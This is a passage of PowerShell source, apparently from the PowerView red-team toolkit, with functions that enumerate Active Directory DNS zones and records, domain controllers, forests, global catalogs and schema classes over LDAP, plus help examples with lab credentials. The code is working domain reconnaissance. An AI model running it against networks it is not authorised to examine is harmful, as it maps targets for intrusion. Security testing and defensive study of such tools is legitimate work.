} + + if ($PSBoundParameters['Server']) { + # if there's not a specified server to bind to, try to pull a logon server from ENV variables + $BindServer = $Server + } + + $SearchString = 'LDAP://' + + if ($BindServer -and ($BindServer.Trim() -ne '')) { + $SearchString += $BindServer + if ($TargetDomain) { + $SearchString += '/' + } + } + + if ($PSBoundParameters['SearchBasePrefix']) { + $SearchString += $SearchBasePrefix + ',' + } + + if ($PSBoundParameters['SearchBase']) { + if ($SearchBase -Match '^GC://') { + # if we're searching the global catalog, get the path in the right format + $DN = $SearchBase.ToUpper().Trim('/') + $SearchString = '' + } + else { + if ($SearchBase -match '^LDAP://') { + if ($SearchBase -match "LDAP://.+/.+") { + $SearchString = '' + $DN = $SearchBase + } + else { + $DN = $SearchBase.SubString(7) + } + } + else { + $DN = $SearchBase + } + } + } + else { + # transform the target domain name into a distinguishedName if an ADS search base is not specified + if ($TargetDomain -and ($TargetDomain.Trim() -ne '')) { + $DN = "DC=$($TargetDomain.Replace('.', ',DC='))" + } + } + + $SearchString += $DN + Write-Verbose "[Get-DomainSearcher] search base: $SearchString" + + if ($Credential -ne [Management.Automation.PSCredential]::Empty) { + Write-Verbose "[Get-DomainSearcher] Using alternate credentials for LDAP connection" + # bind to the inital search object using alternate credentials + $DomainObject = New-Object DirectoryServices.DirectoryEntry($SearchString, $Credential.UserName, $Credential.GetNetworkCredential().Password) + $Searcher = New-Object System.DirectoryServices.DirectorySearcher($DomainObject) + } + else { + # bind to the inital object using the current credentials + $Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString) + } + + $Searcher.PageSize = $ResultPageSize + $Searcher.SearchScope = $SearchScope + $Searcher.CacheResults = $False + $Searcher.ReferralChasing = [System.DirectoryServices.ReferralChasingOption]::All + + if ($PSBoundParameters['ServerTimeLimit']) { + $Searcher.ServerTimeLimit = $ServerTimeLimit + } + + if ($PSBoundParameters['Tombstone']) { + $Searcher.Tombstone = $True + } + + if ($PSBoundParameters['LDAPFilter']) { + $Searcher.filter = $LDAPFilter + } + + if ($PSBoundParameters['SecurityMasks']) { + $Searcher.SecurityMasks = Switch ($SecurityMasks) { + 'Dacl' { [System.DirectoryServices.SecurityMasks]::Dacl } + 'Group' { [System.DirectoryServices.SecurityMasks]::Group } + 'None' { [System.DirectoryServices.SecurityMasks]::None } + 'Owner' { [System.DirectoryServices.SecurityMasks]::Owner } + 'Sacl' { [System.DirectoryServices.SecurityMasks]::Sacl } + } + } + + if ($PSBoundParameters['Properties']) { + # handle an array of properties to load w/ the possibility of comma-separated strings + $PropertiesToLoad = $Properties| ForEach-Object { $_.Split(',') } + $Null = $Searcher.PropertiesToLoad.AddRange(($PropertiesToLoad)) + } + + $Searcher + } +} + + +function Convert-DNSRecord { +<# +.SYNOPSIS + +Helpers that decodes a binary DNS record blob. + +Author: Michael B. Smith, Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +.DESCRIPTION + +Decodes a binary blob representing an Active Directory DNS entry. +Used by Get-DomainDNSRecord. + +Adapted/ported from Michael B. Smith's code at https://raw.githubusercontent.com/mmessano/PowerShell/master/dns-dump.ps1 + +.PARAMETER DNSRecord + +A byte array representing the DNS record. + +.OUTPUTS + +System.Management.Automation.PSCustomObject + +Outputs custom PSObjects with detailed information about the DNS record entry. + +.LINK + +https://raw.githubusercontent.com/mmessano/PowerShell/master/dns-dump.ps1 +#> + + [OutputType('System.Management.Automation.PSCustomObject')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, Mandatory = $True, ValueFromPipelineByPropertyName = $True)] + [Byte[]] + $DNSRecord + ) + + BEGIN { + function Get-Name { + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseOutputTypeCorrectly', '')] + [CmdletBinding()] + Param( + [Byte[]] + $Raw + ) + + [Int]$Length = $Raw[0] + [Int]$Segments = $Raw[1] + [Int]$Index = 2 + [String]$Name = '' + + while ($Segments-- -gt 0) + { + [Int]$SegmentLength = $Raw[$Index++] + while ($SegmentLength-- -gt 0) { + $Name += [Char]$Raw[$Index++] + } + $Name += "." + } + $Name + } + } + + PROCESS { + # $RDataLen = [BitConverter]::ToUInt16($DNSRecord, 0) + $RDataType = [BitConverter]::ToUInt16($DNSRecord, 2) + $UpdatedAtSerial = [BitConverter]::ToUInt32($DNSRecord, 8) + + $TTLRaw = $DNSRecord[12..15] + + # reverse for big endian + $Null = [array]::Reverse($TTLRaw) + $TTL = [BitConverter]::ToUInt32($TTLRaw, 0) + + $Age = [BitConverter]::ToUInt32($DNSRecord, 20) + if ($Age -ne 0) { + $TimeStamp = ((Get-Date -Year 1601 -Month 1 -Day 1 -Hour 0 -Minute 0 -Second 0).AddHours($age)).ToString() + } + else { + $TimeStamp = '[static]' + } + + $DNSRecordObject = New-Object PSObject + + if ($RDataType -eq 1) { + $IP = "{0}.{1}.{2}.{3}" -f $DNSRecord[24], $DNSRecord[25], $DNSRecord[26], $DNSRecord[27] + $Data = $IP + $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'A' + } + + elseif ($RDataType -eq 2) { + $NSName = Get-Name $DNSRecord[24..$DNSRecord.length] + $Data = $NSName + $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'NS' + } + + elseif ($RDataType -eq 5) { + $Alias = Get-Name $DNSRecord[24..$DNSRecord.length] + $Data = $Alias + $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'CNAME' + } + + elseif ($RDataType -eq 6) { + # TODO: how to implement properly? nested object? + $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length])) + $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'SOA' + } + + elseif ($RDataType -eq 12) { + $Ptr = Get-Name $DNSRecord[24..$DNSRecord.length] + $Data = $Ptr + $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'PTR' + } + + elseif ($RDataType -eq 13) { + # TODO: how to implement properly? nested object? + $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length])) + $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'HINFO' + } + + elseif ($RDataType -eq 15) { + # TODO: how to implement properly? nested object? + $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length])) + $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'MX' + } + + elseif ($RDataType -eq 16) { + [string]$TXT = '' + [int]$SegmentLength = $DNSRecord[24] + $Index = 25 + + while ($SegmentLength-- -gt 0) { + $TXT += [char]$DNSRecord[$index++] + } + + $Data = $TXT + $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'TXT' + } + + elseif ($RDataType -eq 28) { + # TODO: how to implement properly? nested object? + $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length])) + $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'AAAA' + } + + elseif ($RDataType -eq 33) { + # TODO: how to implement properly? nested object? + $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length])) + $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'SRV' + } + + else { + $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length])) + $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'UNKNOWN' + } + + $DNSRecordObject | Add-Member Noteproperty 'UpdatedAtSerial' $UpdatedAtSerial + $DNSRecordObject | Add-Member Noteproperty 'TTL' $TTL + $DNSRecordObject | Add-Member Noteproperty 'Age' $Age + $DNSRecordObject | Add-Member Noteproperty 'TimeStamp' $TimeStamp + $DNSRecordObject | Add-Member Noteproperty 'Data' $Data + $DNSRecordObject + } +} + + +function Get-DomainDNSZone { +<# +.SYNOPSIS + +Enumerates the Active Directory DNS zones for a given domain. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty + +.PARAMETER Domain + +The domain to query for zones, defaults to the current domain. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to for the search. + +.PARAMETER Properties + +Specifies the properties of the output object to retrieve from the server. + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER FindOne + +Only return one result object. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-DomainDNSZone + +Retrieves the DNS zones for the current domain. + +.EXAMPLE + +Get-DomainDNSZone -Domain dev.testlab.local -Server primary.testlab.local + +Retrieves the DNS zones for the dev.testlab.local domain, binding to primary.testlab.local. + +.OUTPUTS + +PowerView.DNSZone + +Outputs custom PSObjects with detailed information about the DNS zone. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.DNSZone')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True)] + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateNotNullOrEmpty()] + [String[]] + $Properties, + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Alias('ReturnOne')] + [Switch] + $FindOne, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + PROCESS { + $SearcherArguments = @{ + 'LDAPFilter' = '(objectClass=dnsZone)' + } + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + $DNSSearcher1 = Get-DomainSearcher @SearcherArguments + + if ($DNSSearcher1) { + if ($PSBoundParameters['FindOne']) { $Results = $DNSSearcher1.FindOne() } + else { $Results = $DNSSearcher1.FindAll() } + $Results | Where-Object {$_} | ForEach-Object { + $Out = Convert-LDAPProperty -Properties $_.Properties + $Out | Add-Member NoteProperty 'ZoneName' $Out.name + $Out.PSObject.TypeNames.Insert(0, 'PowerView.DNSZone') + $Out + } + + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainDFSShare] Error disposing of the Results object: $_" + } + } + $DNSSearcher1.dispose() + } + + $SearcherArguments['SearchBasePrefix'] = 'CN=MicrosoftDNS,DC=DomainDnsZones' + $DNSSearcher2 = Get-DomainSearcher @SearcherArguments + + if ($DNSSearcher2) { + try { + if ($PSBoundParameters['FindOne']) { $Results = $DNSSearcher2.FindOne() } + else { $Results = $DNSSearcher2.FindAll() } + $Results | Where-Object {$_} | ForEach-Object { + $Out = Convert-LDAPProperty -Properties $_.Properties + $Out | Add-Member NoteProperty 'ZoneName' $Out.name + $Out.PSObject.TypeNames.Insert(0, 'PowerView.DNSZone') + $Out + } + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainDNSZone] Error disposing of the Results object: $_" + } + } + } + catch { + Write-Verbose "[Get-DomainDNSZone] Error accessing 'CN=MicrosoftDNS,DC=DomainDnsZones'" + } + $DNSSearcher2.dispose() + } + } +} + + +function Get-DomainDNSRecord { +<# +.SYNOPSIS + +Enumerates the Active Directory DNS records for a given zone. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty, Convert-DNSRecord + +.DESCRIPTION + +Given a specific Active Directory DNS zone name, query for all 'dnsNode' +LDAP entries using that zone as the search base. Return all DNS entry results +and use Convert-DNSRecord to try to convert the binary DNS record blobs. + +.PARAMETER ZoneName + +Specifies the zone to query for records (which can be enumearted with Get-DomainDNSZone). + +.PARAMETER Domain + +The domain to query for zones, defaults to the current domain. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to for the search. + +.PARAMETER Properties + +Specifies the properties of the output object to retrieve from the server. + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER FindOne + +Only return one result object. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-DomainDNSRecord -ZoneName testlab.local + +Retrieve all records for the testlab.local zone. + +.EXAMPLE + +Get-DomainDNSZone | Get-DomainDNSRecord + +Retrieve all records for all zones in the current domain. + +.EXAMPLE + +Get-DomainDNSZone -Domain dev.testlab.local | Get-DomainDNSRecord -Domain dev.testlab.local + +Retrieve all records for all zones in the dev.testlab.local domain. + +.OUTPUTS + +PowerView.DNSRecord + +Outputs custom PSObjects with detailed information about the DNS record entry. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.DNSRecord')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [ValidateNotNullOrEmpty()] + [String] + $ZoneName, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateNotNullOrEmpty()] + [String[]] + $Properties = 'name,distinguishedname,dnsrecord,whencreated,whenchanged', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Alias('ReturnOne')] + [Switch] + $FindOne, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + PROCESS { + $SearcherArguments = @{ + 'LDAPFilter' = '(objectClass=dnsNode)' + 'SearchBasePrefix' = "DC=$($ZoneName),CN=MicrosoftDNS,DC=DomainDnsZones" + } + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + $DNSSearcher = Get-DomainSearcher @SearcherArguments + + if ($DNSSearcher) { + if ($PSBoundParameters['FindOne']) { $Results = $DNSSearcher.FindOne() } + else { $Results = $DNSSearcher.FindAll() } + $Results | Where-Object {$_} | ForEach-Object { + try { + $Out = Convert-LDAPProperty -Properties $_.Properties | Select-Object name,distinguishedname,dnsrecord,whencreated,whenchanged + $Out | Add-Member NoteProperty 'ZoneName' $ZoneName + + # convert the record and extract the properties + if ($Out.dnsrecord -is [System.DirectoryServices.ResultPropertyValueCollection]) { + # TODO: handle multiple nested records properly? + $Record = Convert-DNSRecord -DNSRecord $Out.dnsrecord[0] + } + else { + $Record = Convert-DNSRecord -DNSRecord $Out.dnsrecord + } + + if ($Record) { + $Record.PSObject.Properties | ForEach-Object { + $Out | Add-Member NoteProperty $_.Name $_.Value + } + } + + $Out.PSObject.TypeNames.Insert(0, 'PowerView.DNSRecord') + $Out + } + catch { + Write-Warning "[Get-DomainDNSRecord] Error: $_" + $Out + } + } + + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainDNSRecord] Error disposing of the Results object: $_" + } + } + $DNSSearcher.dispose() + } + } +} + + +function Get-Domain { +<# +.SYNOPSIS + +Returns the domain object for the current (or specified) domain. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +.DESCRIPTION + +Returns a System.DirectoryServices.ActiveDirectory.Domain object for the current +domain or the domain specified with -Domain X. + +.PARAMETER Domain + +Specifies the domain name to query for, defaults to the current domain. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-Domain -Domain testlab.local + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-Domain -Credential $Cred + +.OUTPUTS + +System.DirectoryServices.ActiveDirectory.Domain + +A complex .NET domain object. + +.LINK + +http://social.technet.microsoft.com/Forums/scriptcenter/en-US/0c5b3f83-e528-4d49-92a4-dee31f4b481c/finding-the-dn-of-the-the-domain-without-admodule-in-powershell?forum=ITCG +#> + + [OutputType([System.DirectoryServices.ActiveDirectory.Domain])] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True)] + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + PROCESS { + if ($PSBoundParameters['Credential']) { + + Write-Verbose '[Get-Domain] Using alternate credentials for Get-Domain' + + if ($PSBoundParameters['Domain']) { + $TargetDomain = $Domain + } + else { + # if no domain is supplied, extract the logon domain from the PSCredential passed + $TargetDomain = $Credential.GetNetworkCredential().Domain + Write-Verbose "[Get-Domain] Extracted domain '$TargetDomain' from -Credential" + } + + $DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain', $TargetDomain, $Credential.UserName, $Credential.GetNetworkCredential().Password) + + try { + [System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext) + } + catch { + Write-Verbose "[Get-Domain] The specified domain '$TargetDomain' does not exist, could not be contacted, there isn't an existing trust, or the specified credentials are invalid: $_" + } + } + elseif ($PSBoundParameters['Domain']) { + $DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain', $Domain) + try { + [System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext) + } + catch { + Write-Verbose "[Get-Domain] The specified domain '$Domain' does not exist, could not be contacted, or there isn't an existing trust : $_" + } + } + else { + try { + [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() + } + catch { + Write-Verbose "[Get-Domain] Error retrieving the current domain: $_" + } + } + } +} + + +function Get-DomainController { +<# +.SYNOPSIS + +Return the domain controllers for the current (or specified) domain. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer, Get-Domain + +.DESCRIPTION + +Enumerates the domain controllers for the current or specified domain. +By default built in .NET methods are used. The -LDAP switch uses Get-DomainComputer +to search for domain controllers. + +.PARAMETER Domain + +The domain to query for domain controllers, defaults to the current domain. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER LDAP + +Switch. Use LDAP queries to determine the domain controllers instead of built in .NET methods. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-DomainController -Domain 'test.local' + +Determine the domain controllers for 'test.local'. + +.EXAMPLE + +Get-DomainController -Domain 'test.local' -LDAP + +Determine the domain controllers for 'test.local' using LDAP queries. + +.EXAMPLE + +'test.local' | Get-DomainController + +Determine the domain controllers for 'test.local'. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainController -Credential $Cred + +.OUTPUTS + +PowerView.Computer + +Outputs custom PSObjects with details about the enumerated domain controller if -LDAP is specified. + +System.DirectoryServices.ActiveDirectory.DomainController + +If -LDAP isn't specified. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.Computer')] + [OutputType('System.DirectoryServices.ActiveDirectory.DomainController')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True)] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [Switch] + $LDAP, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + PROCESS { + $Arguments = @{} + if ($PSBoundParameters['Domain']) { $Arguments['Domain'] = $Domain } + if ($PSBoundParameters['Credential']) { $Arguments['Credential'] = $Credential } + + if ($PSBoundParameters['LDAP'] -or $PSBoundParameters['Server']) { + if ($PSBoundParameters['Server']) { $Arguments['Server'] = $Server } + + # UAC specification for domain controllers + $Arguments['LDAPFilter'] = '(userAccountControl:1.2.840.113556.1.4.803:=8192)' + + Get-DomainComputer @Arguments + } + else { + $FoundDomain = Get-Domain @Arguments + if ($FoundDomain) { + $FoundDomain.DomainControllers + } + } + } +} + + +function Get-Forest { +<# +.SYNOPSIS + +Returns the forest object for the current (or specified) forest. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: ConvertTo-SID + +.DESCRIPTION + +Returns a System.DirectoryServices.ActiveDirectory.Forest object for the current +forest or the forest specified with -Forest X. + +.PARAMETER Forest + +The forest name to query for, defaults to the current forest. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target forest. + +.EXAMPLE + +Get-Forest -Forest external.domain + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-Forest -Credential $Cred + +.OUTPUTS + +System.Management.Automation.PSCustomObject + +Outputs a PSObject containing System.DirectoryServices.ActiveDirectory.Forest in addition +to the forest root domain SID. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('System.Management.Automation.PSCustomObject')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True)] + [ValidateNotNullOrEmpty()] + [String] + $Forest, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + PROCESS { + if ($PSBoundParameters['Credential']) { + + Write-Verbose "[Get-Forest] Using alternate credentials for Get-Forest" + + if ($PSBoundParameters['Forest']) { + $TargetForest = $Forest + } + else { + # if no domain is supplied, extract the logon domain from the PSCredential passed + $TargetForest = $Credential.GetNetworkCredential().Domain + Write-Verbose "[Get-Forest] Extracted domain '$Forest' from -Credential" + } + + $ForestContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', $TargetForest, $Credential.UserName, $Credential.GetNetworkCredential().Password) + + try { + $ForestObject = [System.DirectoryServices.ActiveDirectory.Forest]::GetForest($ForestContext) + } + catch { + Write-Verbose "[Get-Forest] The specified forest '$TargetForest' does not exist, could not be contacted, there isn't an existing trust, or the specified credentials are invalid: $_" + $Null + } + } + elseif ($PSBoundParameters['Forest']) { + $ForestContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', $Forest) + try { + $ForestObject = [System.DirectoryServices.ActiveDirectory.Forest]::GetForest($ForestContext) + } + catch { + Write-Verbose "[Get-Forest] The specified forest '$Forest' does not exist, could not be contacted, or there isn't an existing trust: $_" + return $Null + } + } + else { + # otherwise use the current forest + $ForestObject = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest() + } + + if ($ForestObject) { + # get the SID of the forest root + if ($PSBoundParameters['Credential']) { + $ForestSid = (Get-DomainUser -Identity "krbtgt" -Domain $ForestObject.RootDomain.Name -Credential $Credential).objectsid + } + else { + $ForestSid = (Get-DomainUser -Identity "krbtgt" -Domain $ForestObject.RootDomain.Name).objectsid + } + + $Parts = $ForestSid -Split '-' + $ForestSid = $Parts[0..$($Parts.length-2)] -join '-' + $ForestObject | Add-Member NoteProperty 'RootDomainSid' $ForestSid + $ForestObject + } + } +} + + +function Get-ForestDomain { +<# +.SYNOPSIS + +Return all domains for the current (or specified) forest. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-Forest + +.DESCRIPTION + +Returns all domains for the current forest or the forest specified +by -Forest X. + +.PARAMETER Forest + +Specifies the forest name to query for domains. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target forest. + +.EXAMPLE + +Get-ForestDomain + +.EXAMPLE + +Get-ForestDomain -Forest external.local + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-ForestDomain -Credential $Cred + +.OUTPUTS + +System.DirectoryServices.ActiveDirectory.Domain +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('System.DirectoryServices.ActiveDirectory.Domain')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True)] + [ValidateNotNullOrEmpty()] + [String] + $Forest, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + PROCESS { + $Arguments = @{} + if ($PSBoundParameters['Forest']) { $Arguments['Forest'] = $Forest } + if ($PSBoundParameters['Credential']) { $Arguments['Credential'] = $Credential } + + $ForestObject = Get-Forest @Arguments + if ($ForestObject) { + $ForestObject.Domains + } + } +} + + +function Get-ForestGlobalCatalog { +<# +.SYNOPSIS + +Return all global catalogs for the current (or specified) forest. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-Forest + +.DESCRIPTION + +Returns all global catalogs for the current forest or the forest specified +by -Forest X by using Get-Forest to retrieve the specified forest object +and the .FindAllGlobalCatalogs() to enumerate the global catalogs. + +.PARAMETER Forest + +Specifies the forest name to query for global catalogs. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-ForestGlobalCatalog + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-ForestGlobalCatalog -Credential $Cred + +.OUTPUTS + +System.DirectoryServices.ActiveDirectory.GlobalCatalog +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('System.DirectoryServices.ActiveDirectory.GlobalCatalog')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True)] + [ValidateNotNullOrEmpty()] + [String] + $Forest, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + PROCESS { + $Arguments = @{} + if ($PSBoundParameters['Forest']) { $Arguments['Forest'] = $Forest } + if ($PSBoundParameters['Credential']) { $Arguments['Credential'] = $Credential } + + $ForestObject = Get-Forest @Arguments + + if ($ForestObject) { + $ForestObject.FindAllGlobalCatalogs() + } + } +} + + +function Get-ForestSchemaClass { +<# +.SYNOPSIS + +Helper that returns the Active Directory schema classes for the current +(or specified) forest or returns just the schema class specified by +-ClassName X. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-Forest + +.DESCRIPTION + +Uses Get-Forest to retrieve the current (or specified) forest. By default, +the .FindAllClasses() method is executed, returning a collection of +[DirectoryServices.ActiveDirectory.ActiveDirectorySchemaClass] results. +If "-FindClass X" is specified, the [DirectoryServices.ActiveDirectory.ActiveDirectorySchemaClass] +result for the specified class name is returned. + +.PARAMETER ClassName + +Specifies a ActiveDirectorySchemaClass name in the found schema to return. + +.PARAMETER Forest + +The forest to query for the schema, defaults to the current forest. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-ForestSchemaClass + +Returns all domain schema classes for the current forest. + +.EXAMPLE + +Get-ForestSchemaClass -Forest dev.testlab.local + +Returns all domain schema classes for the external.local forest. + +.EXAMPLE + +Get-ForestSchemaClass -ClassName user -Forest external.local + +Returns the user schema class for the external.local domain. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-ForestSchemaClass -ClassName user -Forest external.local -Credential $Cred + +Returns the user schema class for the external.local domain using +the specified alternate credentials. + +.OUTPUTS + +[DirectoryServices.ActiveDirectory.ActiveDirectorySchemaClass] + +An ActiveDirectorySchemaClass returned from the found schema. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType([System.DirectoryServices.ActiveDirectory.ActiveDirectorySchemaClass])] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True)] + [Alias('Class')] + [ValidateNotNullOrEmpty()] + [String[]] + $ClassName, + + [Alias('Name')] + [ValidateNotNullOrEmpty()] + [String] + $Forest, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + PROCESS { + $Arguments = @{} + if ($PSBoundParameters['Forest']) { $Arguments['Forest'] = $Forest } + if ($PSBoundParameters['Credential']) { $Arguments['Credential'] = $Credential } + + $ForestObject = Get-Forest @Arguments + + if ($ForestObject) { + if ($PSBoundParameters['ClassName']) { + ForEach ($TargetClass in $ClassName) { + $ForestObject.Schema.FindClass($TargetClass) + } + } + else { + $ForestObject.Schema.FindAllClasses() + } + } + } +} + + +function Find-DomainObjectPropertyOutlier { +<# +.SYNOPSIS + +Finds user/group/computer objects in AD that have 'outlier' properties set. + +Author: Will Schroeder (@harmj0y), Matthew 